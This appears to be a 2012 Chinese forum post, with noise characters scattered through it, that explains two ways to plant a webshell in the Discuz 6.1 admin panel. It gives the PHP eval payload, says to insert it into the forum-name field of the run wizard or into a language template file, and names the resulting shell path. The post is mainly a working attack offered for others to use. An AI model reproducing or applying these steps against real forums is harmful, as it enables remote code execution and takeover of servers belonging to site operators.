discuz6.1两种方法后台拿shell0 V0 f5 q9 U' A
好多朋友说discuz6.1后台不会拿shell,在前段时间这些都是说不公布的东西,我发出来给大家测试一下* L y/ \% }2 n$ p( |; u
1:
% K1 N6 H% F- a4 i4 _# thttp://127.0.0.1/discuz/admincp. ... zard&frames=yes8 c/ ~) b _& G4 h: O( L d0 j
admincp.php?action=runwizard&frames=yes点击下一步然后再论坛名称的地方插入webshell' ^; n; f. q/ e9 l1 n: c) p. p
<?php eval($_POST[cmd]);?>, m& n# g* w! D1 J
后台webshell地址:http://127.0.0.1/discuz/forumdata/logs/runwizardlog.php* F$ v0 q0 ]& O+ g' B
% u |$ Q$ s7 p7 q8 G* s! i {0 f4 q: T4 t5 M- a) O+ d9 p$ F# l; Y
2:后台模板管理--默认模板套系--详情
' c: g( h6 {# B" q' Qtemplates/default/actions.lang.php& {' M& ~: U/ P z9 I
jhackj\\');eval($_POST[cmd])?>;//
8 d8 b Q) F/ G5 d5 n M- n4 Q( U2 J; m: y$ z. G
利用很简单,聪明的人一看就懂了 |
发表于 2012-9-13 16:59:17
收藏
支持
反对